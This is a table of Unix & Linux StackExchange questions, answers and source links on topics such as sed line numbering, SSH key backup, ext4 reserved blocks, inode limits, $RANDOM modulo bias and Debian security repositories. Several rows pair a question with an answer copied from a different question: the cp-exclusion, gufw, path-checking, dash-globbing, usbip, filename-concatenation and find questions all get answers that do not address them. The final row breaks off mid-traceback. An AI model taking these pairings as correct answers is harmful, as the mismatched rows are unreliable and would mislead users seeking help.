source_id | question | response | metadata
---|---|---|---|
526,018 | I have an old-ish Lenovo ideapad 110-15ISK with Fedora 30 installed (and a LUKS-encrypted SSD as storage). When I boot this machine: The "Lenovo" logo (actually just a text) is displayed, briefly. The boot manager screen is displayed with selectable kernels I select a kernel. The "Lenovo" logo is displayed, briefly. A password text entry widget is displayed with the "fedora(∫)" logo at the bottom of the screen. I enter the password to decrypt the LUKS-ified SSD. The boot process continues while the following is displayed: The "Lenovo" logo in the middle of the screen and The "fedora(∫)" logo at the bottom of the screen. Finally the KDE login screen takes over. Why does (7) happen? How is it possible to have the "Logo mashup" unless Fedora comes with a special selection of manufacturer logos to display? Because at that point, it is systemd that is in charge of the monitor (maybe via the framebuffer ). It is quite mysterious. | This is the result of Hans de Goede’s work on flicker-free boot in Fedora. Hans developed a new Plymouth theme which takes the firmware bootsplash and adds the Fedora logo to it, until boot finishes and the desktop environment takes over. This works because bootsplash logos are now exposed as an ACPI resource, which you can see in /sys/firmware/acpi/bgrt on systems which support this. See also the flicker-free FAQ . (This also explains how to modify the Plymouth theme so that the logo is still displayed along with the disk decryption password prompt.) | {
"source": [
"https://unix.stackexchange.com/questions/526018",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/52261/"
]
} |
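The answer above notes that the vendor logo is exposed as an ACPI resource. As a rough illustration (assuming the firmware actually provides a BGRT table and the kernel exposes it), the logo can be inspected directly from sysfs:

```sh
# Minimal sketch: look at the firmware bootsplash that Plymouth reuses.
if [ -d /sys/firmware/acpi/bgrt ]; then
    ls /sys/firmware/acpi/bgrt           # image, status, type, version, xoffset, yoffset
    # "image" is the vendor logo itself, normally a BMP you can copy out:
    cp /sys/firmware/acpi/bgrt/image /tmp/firmware-logo.bmp
else
    echo "no BGRT exposed by this firmware/kernel" >&2
fi
```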
526,064 | Here is my sample file user@linux:~$ cat file.txt
Line 1
Line 2
Line 3
Line 4
Line 5
user@linux:~$ I can print line 2-4 with grep -A2 'e 2' file.txt user@linux:~$ grep -A2 'e 2' file.txt
Line 2
Line 3
Line 4
user@linux:~$ I can also print out the line number as well with grep -n user@linux:~$ grep -nA2 'e 2' file.txt
2:Line 2
3-Line 3
4-Line 4
user@linux:~$ Also, the same thing can be accomplished with sed -n 2,4p file.txt user@linux:~$ sed -n 2,4p file.txt
Line 2
Line 3
Line 4
user@linux:~$ But I'm not sure how to print out the line number with sed Would it be possible to print out the line number with sed ? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"source": [
"https://unix.stackexchange.com/questions/526064",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
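To make the double-sed and paste variants above easier to follow, here is what the first stage alone produces on the sample file from the question: `sed =` emits each line number on its own output line, which is exactly what the second command (`sed 'N;s/\n/ /'` or `paste`) then joins with the text:

```sh
$ sed '2,4!d;=' file.txt
2
Line 2
3
Line 3
4
Line 4
```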
526,088 | I need to copy all files from one UNIX path to another within the same server. However, there are some .zip files I want to exclude while copying. How can I achieve this using the cp command options? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"source": [
"https://unix.stackexchange.com/questions/526088",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358833/"
]
} |
526,527 | Long ago I generated a key pair using ssh-keygen and I used ssh-copy-id to enable login onto many development VMs without manually having to enter a password. I've also uploaded my public key on GitHub, GitLab and similar to authenticate to git repositories using git@ instead of https:// . How can I reinstall my Linux desktop and keep all these logins working? Is backing up and restoring ~/.ssh/ enough? | You need to back up your private keys, at the very least. They cannot be regenerated without having to replace your public key everywhere. These would normally have a name starting with id_ and no extension. The public keys can be regenerated with this command: ssh-keygen -y -f path/to/private/key . Your user configuration (a file called "config") could also be useful if you have set any non-defaults. All of these files would normally be in ~/.ssh, but check first! | {
"source": [
"https://unix.stackexchange.com/questions/526527",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353460/"
]
} |
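As a hedged sketch of the backup and restore itself (the key name id_rsa below is only an example; use whatever private keys you actually have), note that OpenSSH insists on strict permissions after the restore:

```sh
# Back up the whole ~/.ssh directory
tar -czf ssh-backup.tar.gz -C "$HOME" .ssh

# After reinstalling, as the same user:
tar -xzf ssh-backup.tar.gz -C "$HOME"
chmod 700 "$HOME/.ssh"
chmod 600 "$HOME/.ssh"/id_* "$HOME/.ssh/config" 2>/dev/null

# Regenerate a public key from a private one if it went missing:
ssh-keygen -y -f "$HOME/.ssh/id_rsa" > "$HOME/.ssh/id_rsa.pub"
```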
526,745 | I have two servers hosted in IDC. I can only use ports 20/21/22/23/3389/33101-33109 to establish connections between two servers. The IDC network device will block any other packets whose source or destination port is not in the 20/21/22/23/80/3389/33101-33109 list/range. But the source port of SSH is random. Using the command ssh username @ server -p remote_port one can easily specify a remote port. So is there an ssh command parameter or some other way to specify a local source port so I can use, for example, port 33101 to establish the SSH connection? My network topology is like this: | You can not specify the source port for ssh client. But you can use nc as a proxy, like this: ssh -p 33101 -o 'ProxyCommand nc -p 33101 %h %p' $SERVER_2 From How can i set the source port for SSH on unbuntu server? (on ServerFault) . | {
"source": [
"https://unix.stackexchange.com/questions/526745",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359405/"
]
} |
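To avoid retyping the ProxyCommand, the same trick can live in the client configuration. This is a hypothetical ~/.ssh/config entry (the host alias and address are placeholders, and the -p behaviour assumes a netcat variant that lets you pick the local source port, as in the answer above):

```
Host idc-server-2
    HostName 192.0.2.10            # placeholder address of server 2
    Port 33101
    ProxyCommand nc -p 33101 %h %p
```

After that, a plain `ssh idc-server-2` uses source port 33101 automatically.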
526,780 | Changes to /etc/hosts file seem to take effect immediately. I'm curious about the implementation. What magic is used to achieve this feature? Ask Ubuntu: After modifying /etc/hosts which service needs to be restarted? NetApp Support: How the /etc/hosts file works | The magic is opening the /etc/hosts file and reading it: strace -e trace=file wget -O /dev/null http://www.google.com http://www.facebook.com http://unix.stackexchange.com 2>&1 | grep hosts
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 5
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4 The getaddrinfo(3) function, which is the only standard name resolving interface, will just open and read /etc/hosts each time it is called to resolve a hostname. More sophisticated applications which are not using the standard getaddrinfo(3) , but are still somehow adding /etc/hosts to the mix (e.g. the dnsmasq DNS server) may be using inotify(7) to monitor changes to the /etc/hosts files and re-read it only if needed. Browsers and other such applications will not do that. They will open and read /etc/hosts each time they need to resolve a host name, even if they're not using libc's resolver directly, but are replicating its workings by other means. | {
"source": [
"https://unix.stackexchange.com/questions/526780",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359439/"
]
} |
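As a small follow-up sketch, you can watch these opens happen yourself with the inotify-tools package (assuming it is installed); inotify reports the events but not which process triggered them:

```sh
# Each lookup that goes through getaddrinfo() shows up as OPEN/ACCESS events:
inotifywait -m -e open,access,modify /etc/hosts
```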
527,628 | Linux Mint tells me, I only have 622 MB free disk space but there should be some gigabytes left. Looking at the partitions I am told that there are about ten gigabytes unused. I googled the problem and didn't find a solution but I did find the hint that I should check the disk usage with df -h . sudo df -h /home
Filesystem Size Used Avail Use% Mounted on
/dev/nvme0n1p8 189G 178G 622M 100% /home The output doesn't make any sense to me: The difference between Size and Used is 11GB, but it only shows 622M as Available. The SSD isn't old, so I wouldn't expect such a discrepancy. What should I do? | If the filesystem is ext4, there are reserved blocks, mostly to help handling and help avoid fragmentation and available only to the root user. For this setting, it can be changed live using tune2fs (not all settings can be handled like this when the filesystem is mounted): -m reserved-blocks-percentage Set the percentage of the filesystem which may only be allocated by privileged processes. Reserving some number of filesystem blocks
for use by privileged processes is done to avoid filesystem
fragmentation, and to allow system daemons, such as syslogd(8), to
continue to function correctly after non-privileged processes are
prevented from writing to the filesystem. Normally, the default
percentage of reserved blocks is 5%. So if you want to lower the reservation to 1% (~ 2GB) thus getting access to ~ 8GB of no more reserved space, you can do this: sudo tune2fs -m 1 /dev/nvme0n1p8 Note: the -m option actually accepts a decimal number as parameter. You can use -m 0.1 to reserve only about ~200MB (and access most of those previously unavailable 10GB). You can also use the -r option instead to reserve directly by blocks. It's probably not advised to have 0 reserved blocks. | {
"source": [
"https://unix.stackexchange.com/questions/527628",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/327870/"
]
} |
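A hedged before/after sketch of the same operation (substitute your own device for /dev/nvme0n1p8): tune2fs -l shows the current reservation, and df should reflect the change immediately:

```sh
sudo tune2fs -l /dev/nvme0n1p8 | grep -Ei 'block count|reserved'   # current state
sudo tune2fs -m 1 /dev/nvme0n1p8                                   # drop reservation to 1%
df -h /home                                                        # "Avail" grows right away
```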
527,983 | What happens if the limit of 4 billion files was exceeded in an ext4 partition, with a transfer of 5 billion files for example? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/527983",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359833/"
]
} |
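Following on from the mkfs output above, a sketch of provisioning more inodes up front with the -N option mentioned at the end of the answer (the numbers here are illustrative):

```sh
truncate -s 100M more-inodes.img
mkfs.ext4 -N 100000 more-inodes.img    # ask for ~100000 inodes instead of 25688
sudo mount -o loop more-inodes.img /mnt
df -i /mnt                             # far more IFree for the same 100M of storage
sudo umount /mnt
```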
527,997 | I want to install gufw on my Fedora, but I do not know how to do that.
I tried to install with the dnf package manager command but it doesn't work and gets this output: No match for argument: gufw
Error: Unable to find a match So, I did an apt-get and again I got negative result: E: Couldn't find package gufw How can I successfully install gufw? I want to control each app's access to the internet, so is there any firewall app other than gufw ? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/527997",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359491/"
]
} |
528,009 | I have a job script which is not producing results, and one of my suspicions is that there are some files called which are missing, the relevant part of the job scripts looks like this: echo get_data
get_fms_data \
amip1 \
seaesf \
albedo \
lad \
topog \
ggrpsst \
mom4 \
/data0/home/rslat/GFDL/archive/edg/fms/river_routes_gt74Sto61S=river_destination_field \
/data0/home/rslat/GFDL/archive/fms/mom4/mom4p1/mom4p1a/mom4_ecosystem/preprocessing/rho0_profile.nc \
/data0/home/rslat/GFDL/archive/fms/mom4/mom4p0/mom4p0c/mom4_test8/preprocessing/fe_dep_ginoux_gregg_om3_bc.nc=Soluble_Fe_Flux_PI.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/cover_type_1860_g_ens=cover_type_field \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/soil_color.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/biodata.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/ground_type.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/groundwater_residence.nc \
/data0/home/rslat/GFDL/archive/ms2/esm2.1/input/max_water.nc \
... As a first step, I want to copy all these paths into a text file and then check if they actually exist. Is there an easy way to do it? I looked in other questions but most of them refer to checking only one file and not from a file. Thank you! | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/528009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356086/"
]
} |
528,343 | I read about RNGs on Wikipedia and $RANDOM function on TLDP but it doesn't really explain this result: $ max=$((6*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
21787 0
22114 1
21933 2
12157 3
10938 4
11071 5 Why are the values above about 2x more inclined to be 0, 1, 2 than 3, 4, 5 but when I change the max modulo they're almost equally spread over all 10 values? $ max=$((9*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
11940 0
11199 1
10898 2
10945 3
11239 4
10928 5
10875 6
10759 7
11217 8 | To expand on the topic of modulo bias, your formula is: max=$((6*3600))
$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between
0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
0 = 21600-25199
1 = 25200-28799
2 = 28800-32399
3 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
6 = 21600-25199
7 = 25200-28799
8 = 28800-32399
0 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6
for f in {1..100000}
do
r=$RANDOM
while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done
echo $(($r%max))
done | sort | uniq -c | sort -n Test result: 16425 5
16515 1
16720 0
16769 2
16776 4
16795 3 The alternative would be using a different random source that does not have noticeable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"source": [
"https://unix.stackexchange.com/questions/528343",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/82399/"
]
} |
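An alternative sketch, if GNU coreutils is available: let shuf draw the values directly instead of reducing $RANDOM, which sidesteps the modulo bias entirely:

```sh
shuf -r -i 0-5 -n 100000 | sort | uniq -c   # -r repeats values, -i gives the range
```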
528,361 | I'm working with a copy of Raspbian, installed with pi-gen . Pi-gen runs in a Docker container with a volume for the filesystem, running debootstrap and custom scripts inside a chroot to the volume. I'm running a shell inside the Raspbian filesystem using chroot and qemu-arm-static , but without Docker. I noticed that the mkinitramfs script was not working. I traced the problem back to dash , which the script is running in. For some reason dash is not expanding filename wildcards in commands: # echo /*
/*
# ls /
bin boot dev etc home lib media mnt opt proc root run sbin sys tmp usr var This happens in all folders inside the chroot and also in scripts .
This breaks a lot of stuff. However, wildcard expansion works normally in filesystems bind-mounted inside the chroot , such as /proc and /run . Also, path expansion using the same dash binary works inside a different chroot . I've already tried set +f and set +o noglob with no luck. The noglob option is definitely not on: # set -o
Current option settings
errexit off
noglob off
ignoreeof off
interactive on
monitor on
noexec off
stdin on
xtrace off
verbose off
vi off
emacs off
noclobber off
allexport off
notify off
nounset off
nolog off
debug off I'm running version 0.5.8-2.4 of the dash package from http://raspbian.raspberrypi.org/raspbian stretch/main armhf . The host machine is running Kali Linux 2019.1 with kernel 4.19.0-kali4-amd64 . Has anyone seen a similar problem before? What could I use as a workaround? Update: The following is the relevant part of the strace dump in a working chroot : read(0, "echo /*\n", 8192) = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents(3, /* 11 entries */, 32768) = 264
getdents(3, /* 0 entries */, 32768) = 0
close(3) = 0
write(1, "/bin /dev /etc /lib /pls /proc /"..., 46) = 46 The same in the non-working chroot : read(0, "echo /*\n", 8192) = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(3, /* 20 entries */, 32768) = 488
close(3) = 0
write(1, "/*\n", 3) = 3 | To expand on the topic of modulo bias, your formula is: max=$((6*3600))
$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between
0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
0 = 21600-25199
1 = 25200-28799
2 = 28800-32399
3 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
6 = 21600-25199
7 = 25200-28799
8 = 28800-32399
0 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6
for f in {1..100000}
do
r=$RANDOM
while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done
echo $(($r%max))
done | sort | uniq -c | sort -n Test result: 16425 5
16515 1
16720 0
16769 2
16776 4
16795 3 The alternative would be using a different random source that does not have noticeable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"source": [
"https://unix.stackexchange.com/questions/528361",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360809/"
]
} |
528,751 | I cannot run apt-get update as I encounter the following error: # apt-get update
Hit:1 http://ftp.br.debian.org/debian testing InRelease
Ign:2 http://security.debian.org/debian-security testing/updates InRelease
Err:3 http://security.debian.org/debian-security testing/updates Release
404 Not Found [IP: 151.101.92.204 80]
Reading package lists... Done
E: The repository 'http://security.debian.org/debian-security testing/updates Release' no longer has a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
E: Repository 'http://ftp.br.debian.org/debian testing InRelease' changed its 'Codename' value from 'buster' to 'bullseye'
N: This must be accepted explicitly before updates for this repository can be applied. See apt-secure(8) manpage for details. So there are two error messages here: The repository no longer has a Release file, which is weird. I checked at http://security-cdn.debian.org/debian-security/zzz-dists/testing/updates/ ant it looks like the Release file is there. Am I looking in the wrong place or is there something else happening? The repository changed its name from buster to bullseye and that this "must be accepted explicitly" (I saw this once today; it wasn't there when I opened the question and it does not appear anymore). This isn't really surprising, but I didn't expect it to be a problem if I'm tracking the repository as testing instead of the release name. What can I do? APT is telling me to read the apt-secure(8) , but it either does not have the information I need or I cannot understand it. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"source": [
"https://unix.stackexchange.com/questions/528751",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/136742/"
]
} |
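Applied to a sources.list that tracks testing, the change described above ends up looking like this (the component list is illustrative; keep whatever your file already uses):

```
deb http://security.debian.org/debian-security testing-security main contrib non-free
deb-src http://security.debian.org/debian-security testing-security main contrib non-free
```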
528,769 | I am looking to have a host start up and run usbip [Unit]
Description=USB-IP Binding
After=network-online.target
[Service]
ExecStartPre=/usr/sbin/usbipd -D
ExecStart=/usr/sbin/usbip bind --busid 1-1.5
ExecStop=/usr/sbin/usbip unbind --busid 1-1.5
Restart=on-failure
[Install]
WantedBy=default.target It appears to start correctly with out error, but when i go to the client and list the server it does not show that usbip running. Also does anyone know of a script to share all USB device via USBIP. Thank you for the help. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"source": [
"https://unix.stackexchange.com/questions/528769",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361175/"
]
} |
529,009 | I tried to upgrade my Debian System using apt , the repository is set to "testing" so I expected it to change to the next version "Bullseye" from "Buster" automatically but since "Buster" moved on I get: 404 Not Found [IP: 151.101.12.204 80] when running apt update . The security.debian.org address does not seem to have Release files, did the address change? E: The repository 'http://security.debian.org testing/updates Release' no longer has a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details. this are the relevant entries of my /etc/apt/sources.list : deb http://ftp.ch.debian.org/debian/ testing main contrib non-free
deb-src http://ftp.ch.debian.org/debian/ testing main contrib non-free
deb http://security.debian.org/ testing/updates main contrib non-free
deb-src http://security.debian.org/ testing/updates main contrib non-free
# jessie-updates, previously known as 'volatile'
deb http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free
deb-src http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free I checked man apt-secure but could not find or understand the relevant information. Update: I got two answers so far, both referring to the ofical debian.org page, but suggest a complete different solution. Can someone please explain, since I decided to not remove the security.debian.org entries, but changed the version-attribute format. | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-free
deb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"source": [
"https://unix.stackexchange.com/questions/529009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/240990/"
]
} |
529,012 | I am new to bash shell scripting, apologies if this was already asked. I have combinations of multiple files such as: USA.txt Florida.txt Miami.txt I would like to join those files and create a new file which contains everything such as: cat *.txt > USA_FLORIDA_MIAMI.txt In another case The thing is that some other time the files have a different prefix: Canada.txt Quebec.txt Montreal.txt so in this second case, the output will be CANADA_QUEBEC_MONTREAL.txt: cat *.txt > CANADA_QUEBEC_MONTREAL.txt and so on for all the combinations of other files In the first case scenario, USA.txt Florida.txt Miami.txt are the only .txt files present in the directory. In the second case, they will be replaced by Canada.txt Quebec.txt Montreal.txt so I would need to write a code which all the time combines the information of the prefix of all the .txt files present at that time in the directory and it adds it to the prefix of the output file. The variable here is the name of the Country, State and City. Any suggestion about any command which I could use?
thanks | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-free
deb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"source": [
"https://unix.stackexchange.com/questions/529012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361114/"
]
} |
529,379 | I have a bash script which simply docker pushes an image: docker push $CONTAINER_IMAGE:latest I want to loop for 3 times when this fails. How should I achieve this? | Use for-loop and && break : for n in {1..3}; do
docker push $CONTAINER_IMAGE:latest && break;
done break quits the loop, but only runs when docker push succeeded. If docker push fails, it will exit with error and the loop will continue. | {
"source": [
"https://unix.stackexchange.com/questions/529379",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/62249/"
]
} |
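A slightly longer sketch of the same idea, adding a pause between attempts and a non-zero exit if all three pushes fail, so a CI job is marked as failed:

```sh
ok=0
for n in 1 2 3; do
    if docker push "$CONTAINER_IMAGE:latest"; then ok=1; break; fi
    echo "push failed (attempt $n), waiting before retry" >&2
    sleep $((n * 10))
done
[ "$ok" -eq 1 ] || exit 1
```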
529,670 | Using Bash, File: <?xml version="1.0" encoding="UTF-8"?>
<blah>
<blah1 path="er" name="andy" remote="origin" branch="master" tag="true" />
<blah1 path="er/er1" name="Roger" remote="origin" branch="childbranch" tag="true" />
<blah1 path="er/er2" name="Steven" remote="origin" branch="master" tag="true" />
</blah> I have tried the following: grep -i 'name="andy" remote="origin" branch=".*\"' <filename> But it returns the whole line: <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> I would like to match the line based on the following: name="andy" I just want it to return: master | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529670",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361957/"
]
} |
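A related sketch using the same sample file: the -m (match) template loops over every blah1 element, so all name/branch pairs can be listed in one pass:

```sh
$ xmlstarlet sel -t -m '//blah1' -v '@name' -o ' ' -v '@branch' -n file.xml
andy master
Roger childbranch
Steven master
```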
529,679 | I have some non standard and standard filenames like the ones below . I need to get the count of files that are NOT standard.. Standard file names: XYZ ABC .txt, XYZ ABC .csv, *.msg Non standard file names: 989875.txt or myname.csv ; this has no bounds and can be anything.. The only good part is I know the standard one and i just need to do a NOT condition to simple find command. How can i do it. Not interested to do a file LOOP etc.. | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361571/"
]
} |
529,696 | Just now: $ vagrant plugin update
Updating installed plugins...
Fetching public_suffix-3.1.1.gem
Fetching vagrant-lxd-0.4.2.gem
Traceback (most recent call last):
19: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/bin/vagrant:182:in `<main>'
18: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/environment.rb:290:in `cli'
17: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/cli.rb:66:in `execute'
16: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/root.rb:66:in `execute'
15: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/update.rb:28:in `execute'
